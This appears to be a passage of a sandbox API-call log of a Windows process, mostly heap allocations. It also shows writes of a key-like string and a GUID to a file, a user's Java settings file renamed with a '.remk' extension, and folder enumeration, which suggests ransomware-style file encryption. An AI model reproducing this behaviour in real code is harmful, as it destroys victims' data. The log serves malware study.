hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.242] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca08 | out: hHeap=0x630000) returned 1 [0237.242] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0237.242] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9f0 | out: hHeap=0x630000) returned 1 [0237.242] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0237.242] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0237.242] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca50 | out: hHeap=0x630000) returned 1 [0237.242] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0237.242] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0237.242] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0237.242] GetCurrentThreadId () returned 0x314 [0237.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31a4298 [0237.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c6a70 [0237.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0237.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694fd0 [0237.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0237.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0237.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0237.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0237.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.243] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.243] GetCurrentThreadId () returned 0x314 [0237.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.243] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0237.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.243] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.243] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.243] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0237.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0237.243] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0237.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0237.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0237.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0237.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0237.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca50 [0237.243] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0237.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0237.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0237.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0237.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0237.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0237.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0237.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0237.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9f0 [0237.244] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0237.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0237.244] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0237.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0237.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0237.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0237.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0237.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca08 [0237.244] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0237.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0237.244] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0237.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9d8 [0237.244] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0237.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca68 [0237.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0237.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0237.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0237.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca38 [0237.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0237.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca20 [0237.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0237.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bca80 [0237.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca20 | out: hHeap=0x630000) returned 1 [0237.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bca20 [0237.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca38 | out: hHeap=0x630000) returned 1 [0237.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0237.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0237.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0237.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0237.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0237.246] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9f0 | out: hHeap=0x630000) returned 1 [0237.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9f0 [0237.246] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0237.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x37b5b70 [0237.246] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca50 | out: hHeap=0x630000) returned 1 [0237.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0237.246] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca80 | out: hHeap=0x630000) returned 1 [0237.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37b5d80 [0237.246] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0237.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0237.246] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0237.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6e78 [0237.246] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9f0 | out: hHeap=0x630000) returned 1 [0237.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5f98 [0237.246] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0237.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0237.246] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0237.246] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694fd0 | out: hHeap=0x630000) returned 1 [0237.246] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0237.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0237.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0237.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6e78 | out: hHeap=0x630000) returned 1 [0237.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5d80 | out: hHeap=0x630000) returned 1 [0237.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5f98 | out: hHeap=0x630000) returned 1 [0237.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0237.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0237.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca20 | out: hHeap=0x630000) returned 1 [0237.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0237.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca68 | out: hHeap=0x630000) returned 1 [0237.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0237.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca08 | out: hHeap=0x630000) returned 1 [0237.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9d8 | out: hHeap=0x630000) returned 1 [0237.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0237.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0237.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0237.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9c0 | out: hHeap=0x630000) returned 1 [0237.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf330 | out: hHeap=0x630000) returned 1 [0237.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0237.248] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0237.248] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0237.248] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0237.248] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0237.248] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0237.248] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0237.248] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0237.248] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0237.248] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0237.248] WriteFile (in: hFile=0x640, lpBuffer=0x31c0d08*, nNumberOfBytesToWrite=0x2ca, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x31c0d08*, lpNumberOfBytesWritten=0x3adfb14*=0x2ca, lpOverlapped=0x0) returned 1 [0237.248] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0237.248] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x2cf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.248] WriteFile (in: hFile=0x640, lpBuffer=0x31a4298*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31a4298*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0237.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0237.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0237.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0237.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37b5b70 [0237.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0237.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0237.249] WriteFile (in: hFile=0x640, lpBuffer=0x37b5b70*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37b5b70*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0237.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.249] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.249] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0237.249] CloseHandle (hObject=0x640) returned 1 [0237.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c79a0 [0237.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8c0) returned 0x37bd408 [0237.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c79a0 | out: hHeap=0x630000) returned 1 [0237.251] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties.remk")) returned 1 [0237.251] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0237.251] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.251] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31658e8 | out: hHeap=0x630000) returned 1 [0237.253] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1e5aaf0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1e5aaf0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1e5aaf0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="security", cAlternateFileName="")) returned 1 [0237.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b66c0 [0237.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6810 [0237.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xfc) returned 0x31a4298 [0237.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0237.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd0) returned 0x3189350 [0237.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c79a0 [0237.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7a68 [0237.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7cc0 [0237.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7d88 [0237.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b68b8 | out: hHeap=0x630000) returned 1 [0237.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31891a0 | out: hHeap=0x630000) returned 1 [0237.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7b30 | out: hHeap=0x630000) returned 1 [0237.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7bf8 | out: hHeap=0x630000) returned 1 [0237.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0237.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c78d8 | out: hHeap=0x630000) returned 1 [0237.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4610 | out: hHeap=0x630000) returned 1 [0237.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b68b8 [0237.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6810 | out: hHeap=0x630000) returned 1 [0237.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b66c0 | out: hHeap=0x630000) returned 1 [0237.253] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tmp", cAlternateFileName="")) returned 1 [0237.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ea28 [0237.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eac0 [0237.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ea28 | out: hHeap=0x630000) returned 1 [0237.254] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c8 | out: hHeap=0x630000) returned 1 [0237.254] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tmp", cAlternateFileName="")) returned 0 [0237.254] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0237.254] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0237.254] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0237.254] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0237.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0237.254] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0237.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0237.254] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.254] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c8 | out: hHeap=0x630000) returned 1 [0237.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0237.254] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.254] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c8 | out: hHeap=0x630000) returned 1 [0237.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0237.254] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.254] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c8 | out: hHeap=0x630000) returned 1 [0237.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0237.254] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c8 | out: hHeap=0x630000) returned 1 [0237.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0237.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c8 | out: hHeap=0x630000) returned 1 [0237.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0237.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c8 | out: hHeap=0x630000) returned 1 [0237.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0237.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x37bfdb0 [0237.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0237.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c8 | out: hHeap=0x630000) returned 1 [0237.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0237.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c8 | out: hHeap=0x630000) returned 1 [0237.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0237.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c8 | out: hHeap=0x630000) returned 1 [0237.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0237.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c8 | out: hHeap=0x630000) returned 1 [0237.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 